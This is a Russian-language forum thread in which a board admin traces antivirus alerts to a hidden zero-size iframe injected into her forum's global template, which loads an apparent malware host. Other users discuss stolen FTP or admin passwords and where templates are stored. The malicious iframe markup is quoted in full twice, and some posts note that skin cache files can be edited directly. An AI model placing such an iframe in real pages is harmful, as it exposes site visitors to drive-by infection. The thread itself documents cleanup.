Перейти к контенту
  • 0

Троян Backdoor на форуме


ElenaI

Вопрос

Странная ситуация - вылавливают его не все юзеры, меньшинство, но сам факт меня озадачил. Прошлась по файлам - никаких изменений с апреля, а вирусные предупреждения начались в августе. Попросила очень занятого программиста хоть глазком одним посмотреть, что за чертовщина. Он "глянул рендерный текст" и вот чего узрел прямо после хедера:

<!-- / End board header -->

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

 

Вопрос такой - ГДЕ искать эту строку? в каких файлах? Голову сломала уже :D

Версия форума 2.2.2, лицензионная

Ссылка на комментарий
Поделиться на других сайтах

  • Ответы 60
  • Создана
  • Последний ответ

Лучшие авторы в этом вопросе

Лучшие авторы в этом вопросе

Загружено фотографий

Рекомендуемые сообщения

  • 0

Друзья мои, ОГРОМНОЕ спасибо за поддержку и предложенную помощь.

Представьте себе, я таки нашла эту дрянь! Она сидела в общем шаблоне форума, куда я даже не догадалась полезть (смотрела в html шаблонах, как рекомендовали, а на этот не обратила внимание)... Господи, как же все было просто :D

Вот оно:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-type" content="text/html; charset=<% CHARSET %>" />

<link rel="shortcut icon" href="favicon.ico" />

<title><% TITLE %></title>

<% GENERATOR %>

<% CSS %>

<% JAVASCRIPT %>

</head>

<body>

<div id="ipbwrapper">

<% BOARD HEADER %>

<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

<% MEMBER BAR %>

<% NAVIGATION %>

<!--IBF.NEWPMBOX-->

<% BOARD %>

<% BOARD FOOTER %>

<% STATS %>

<% COPYRIGHT %>

</div>

</body>

</html>

 

В общем, всем спасибо. Я серьезно.

Только у меня вопрос - эту строку я просто удалила, но теперь при ответах в форум страница грузится с ошибкой - требуется объект (а раньше на той строке был прописан вирус, и мой комп его запрещал). Кто-нить мог бы у себя в админке глянуть - на месте выделенного мною жирным шрифтом у вас что-то прописано? Не урл ли форума?

Ссылка на комментарий
Поделиться на других сайтах

  • 0
<iframe src="http://icqspl.jino-net.ru/index.php" width="0" height="0"></iframe>

У меня этой строки вообще нет.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

2 ElenaI Как взломали незнаю лень лог читать/ Но после фикса такого уже небsло.

 

Как на меня, то вам нужно забєкапить базу; переставить форум; следить за обновлениями.

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.
Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось. :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0

После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

Ссылка на комментарий
Поделиться на других сайтах

  • 0
После того, как удалили эту строку. ОБЯЗАТЕЛЬНО смените пароли на фтп. После этого проверьте свой комп на вирусы. А вообще лучше не хранить пароли к фтп в прогах. Лучше гденить их записывать, а потом просто вставлять в адрес строку с доступом...

Но это точно сидело на вашем компе и стырило пароли от фтп...

Да, спасибо. Пароли я сменила сразу, как выяснилось, что на форме вирус. Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать? Я не очень в этом разбираюсь, поэтому прошу прощеняи за глупый вопрос, но мне казалось, что с шаблонами форума можно работать только через админку форума, по крайней мере, с общим шаблоном... :D

Ссылка на комментарий
Поделиться на других сайтах

  • 0
На ФТП его не достать. Так что или узнали пароль от БД(маловероятно), либо пароль админа. Проверьте что у вас стоят все обновления безопасности(ссылка в подписи: Wiki).
Ссылка на комментарий
Поделиться на других сайтах

  • 0
В кеше нет Глобального шаблона :D
Ссылка на комментарий
Поделиться на других сайтах

  • 0
В кеше нет Глобального шаблона ;)

skin_global.php ... например я выбрал папку cacheid_2.... пропиши что-нибудь(лол там и т.д. :D ) на 395(например) строке файла и посмотри на результат ))

Ссылка на комментарий
Поделиться на других сайтах

  • 0
ЕленаI туда нужно было посмотреть в первую очередь.

Было бы здорово услышать этот ответ от техподдержки не постфактум, когда решение проблемы найдено, а в тот момнт, когда я отправила к вам письмо с вопросом по этой проблеме. Техподдержка же порекомендовала просканировать шаблон хедера и на этом все закончилось. :D

Я не техподдержка

 

Nonamers

 

глобальный шаблон форума (Board Wrapper) не хранится в skin_global

Ссылка на комментарий
Поделиться на других сайтах

  • 0
глобальный шаблон форума (Board Wrapper) не хранится в skin_global

я просто говорил что через файлы кеша можно прописать хоть что... а не обязательно через админку

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ещё раз: глобальный шаблон форума не хранится ни в файловом кеше (skin_*.php), ни в БД кеше (cache_store).

Поэтому его нельзя изменить сказанными вами способом.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ну ты как маленький =)

я ж не просто так спорю, а смотрю код форума и вижу откуда там чего берётся.

 

ну ок, покажи, что именно и где именно ты менял в skin_*.php

Ссылка на комментарий
Поделиться на других сайтах

  • 0

cache\skin_cache\cacheid_2\

 

skin_global.php

 

<!-- Msg Layer -->
<div id='ipd-msg-wrapper'>
<div id='ipd-msg-title'>
	<a href='#' onclick='document.getElementById(\"ipd-msg-wrapper\").style.display=\"none\"; return false;'><img src='style_images/<#IMG_DIR#>/close.png' alt='X' title='Close Window' class='ipd' /></a>   <strong>{$this->ipsclass->lang['gbl_sitemsg_header']}</strong>
</div>
<div id='ipd-msg-inner'><span style='font-weight:bold' id='ipd-msg-text'></span><div class='pp-tiny-text'>{$this->ipsclass->lang['gbl_auto_close']}</div></div>
</div>
<!-- Msg Layer -->
") : ("")) . "
[b][color="#FF0000"]test[/color][/b]
<!-- / End board header -->";

 

http://rl.foto.radikal.ru/0709/4a/a5dfc2030b2et.jpg

 

p.s. версия 2.3.1

Ссылка на комментарий
Поделиться на других сайтах

  • 0

ну так это не глобальный шаблон форума.

Глобальный шаблон форума вот:

post-1993-1188925815_thumb.jpg

Он не хранится в кеше.

 

Так что

В кеше нет Глобального шаблона :D

совершенно верно.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

да че ты пристал со своим глобальным шаблоном :D)) не в этом суть была ;)

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

Ссылка на комментарий
Поделиться на других сайтах

  • 0
да че ты пристал со своим глобальным шаблоном

Как "чего это я пристал".

Елена нашла следы именно в глобальном шаблоне, а не в где-то в skin_*.php. Саннис говорил тебе про глобальный шаблон. Говорил что нет его в кеше, ты спорил. Я согласился с ним.

да и с правами тут проблемы - кроме администрации и вас никто не может смотреть вложения

ок, вот http://forum.sysman.ru/uploads/at/7/post-22-1188926329_thumb.jpg

 

skin_global.php это не есть глобальный шаблон форума.

Это игра слов, не более.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

вообще, я отвечал на этот вопрос :D

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

ну да ладно ;) забили

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Нельзя его достать физически по FTP.

А skin_global.php, про который вы привели пример физической записи - это не то, про что она имела ввиду.

Ссылка на комментарий
Поделиться на других сайтах

  • 0

Пойми, что

 

Но меня мучает один вопрос: строку вписали в общий шаблон форума, а его в физическом виде по FTP разве можно достать?

 

"строку вписали в общий шаблон форума" - это как раз глобальный шаблон форума.

"а его в физическом виде по FTP разве можно достать" - "а его [глобальный шаблон] разве можно физически достать?" - ответ "Нет"

 

 

Ты привёл пример записи в skin_global.php это не общий шаблон, и она не про него говорила.

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...

×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.